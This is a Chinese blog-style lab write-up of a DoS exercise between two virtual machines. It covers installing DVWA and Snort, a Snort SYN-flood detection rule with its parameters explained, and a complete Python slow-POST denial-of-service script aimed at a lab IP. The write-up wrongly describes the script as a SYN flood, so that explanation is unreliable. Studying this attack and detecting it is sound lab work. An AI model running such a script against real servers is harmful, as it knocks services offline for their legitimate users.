使用Python+Snort进行DoS攻防实战

最近对DoS攻击进行了实战，这里做个记录

环境

实验用到了两台虚拟机，分别是攻击机和靶机，其配置如下：

• 攻击机
  • Windows 10
  • Python3.8.2
• 靶机
  • Ubuntu 20.04
  • web server（这里用的DVWA作为网站，xamp作为服务器）
  • Snort 2.9.18.1

环境搭建

攻击机

直接在官网下载Python3，无脑双击安装即可

靶机

网站搭建

下载网站源码，这里直接拿的DVWA的源码做实验

下载官方推荐的xampp

执行命令：

sudo chmod 777 xampp-linux-x64-7.4.3-0-installer.run
sudo ./xampp-linux-x64-7.4.3-0-installer.run

在弹出来的界面处，点击Welcome界面，点击Open Application Folder：

打开目录

找到hotdocs文件夹，将解压后的dvwa网站源码放进去，并运行以下命令：

sudo chmod 777 -R DVWA-master

点击Manage Servers，然后点击Start All按钮：

start all

全绿即可。

如果绿不了，尝试以下命令即可解决：

sudo service mysql stop
sudo service mysqld stop
sudo service nginx stop
sudo service apache stop
sudo service apache2 stop

然后修改网站源码下的config文件夹内的config.inc.php.dist为config.inc.php，然后更改文件内容（主要是数据库账号密码）

然后就可以打开网站了：

网站搭建成功

Snort安装

这里参考博客进行安装，不再赘述

环境配置

靶机snort配置

首先使用命令编辑snort.conf：

sudo gedit /etc/snort/snort.conf

将其中的RULE_PATH更改为实际环境中存放规则的路径

使用命令编辑local.rules（具体路径根据实际情况来）：

sudo gedit /etc/snort/rules/rules/local.rules

添加DoS攻击检测规则在文件末尾：

alert tcp any any -> $HOME_NET 80 (flags: S; msg: "Possible DoS Attack Type: SYN flood"; classtype:attempted-dos; flow:stateless; sid:3; detection_filter:track by_dst, count 20, seconds 10;)

其中：

• alert表示显示为告警
• tcp表示检测的协议
• any any表示检测任意IP和端口发送的数据包
• ->表示to
• $HOME_NET表示目的ip
• 80表示目的端口
• flags用于检查是否存在特定的TCP标志位，这里的-S表示- SYN - Synchronize sequence numbers，其他参数具体可见官方文档
• msg表示显示在告警中的描述
• classtype表示告警分类，不可随意命名，其可选参数可见官方文档
• flow关键字与会话跟踪一起使用，它允许规则只适用于交通流的某些方向。这里的stateless表示触发器与流处理器的状态无关，其他参数具体可见官方文档
• sid表示规则的唯一标识符，由于100-1,000,000的号码均已被注册，因此需要自定义一个该范围之外的数字
• detection_filter定义了一个速率，在规则生成事件之前，源主机或目标主机必须超过这个速率，这里设定为10秒内的数据包达到20个即判定为DoS攻击

规则设定完成之后，首先运行命令查看网卡：

ifconfig

网卡查看

注意图中红框圈出的地方即为网卡标识符

然后验证并配置规则：

sudo snort -T -c /etc/snort/snort.conf -i ens33

其中：

• -c表示configuration，即使用/etc/snort/snort.conf作为配置文件
• -i表示interface，即调用的网卡接口，这里使用上文中查看到的网卡标识符

出现以下界面则表示规则书写并配置正确：

规则配置成功

攻击机DoS脚本

参考网上的DoS攻击源码，改一改使其适用于Python3，脚本源码为：

#!/usr/bin/env python
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST="192.168.80.133"
PAGE="/DVWA-master/login.php"
#---------------------------
 
buf=(("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST)).encode())
 
socks=[]
 
def conn_thread():
    global socks
    for i in range(0,MAX_CONN):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        try:
            s.connect((HOST,PORT))
            s.send(buf)
            print("Send buf OK!,conn=%d\n"%i)
            socks.append(s)
        except Exception as ex:
            print("Could not connect to server or send error:%s"%ex)
            time.sleep(10)
#end def
 
def send_thread():
    global socks
    while True:
        for s in socks:
            try:
                s.send(b"f")
                #print("send OK!")
            except Exception as ex:
                print("Send Exception:%s\n"%ex)
                socks.remove(s)
                s.close()
        time.sleep(1)
#end def
 
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
 
conn_th.start()
send_th.start()

然后保存为DOS.py备用
其攻击原理为不停地向目标机器发送TCP握手请求，发送SYN包建立连接，但不发送ACK包完成连接，从而导致目标机器一直处于等待连接建立的状态，消耗大量系统资源，从而没有剩余资源对正常的网络请求进行响应。

攻击&检测

在靶机使用命令启动snort：

sudo snort -A console -q -c /etc/snort/snort.conf -i ens33

其中：

• -A console表示显示标准的告警输出
• -q表示quiet，即以静默模式启动
• -c表示配置文件
• -i表示接口

然后在攻击机中，打开cmd窗口，使用命令运行脚本：

python3 DOS.py

实施攻击

此时，通过浏览器打开原网站，可以发现页面无法正常加载，攻击实施成功，甚至还把数据库账号密码爆了出来hhhh（图中打码处为数据库密码）：

无法打开网页

然后查看靶机，可看到检测到了DoS攻击，表明检测规则有效：

检测到DoS攻击

参考资料

• Snort Users Manual
• Detect Dos, ping etc.. using SNORT
• 入侵检测系统Snort的安装、配置与测试
• 使用Snort检测企业流量
• python版本DDOS攻击脚本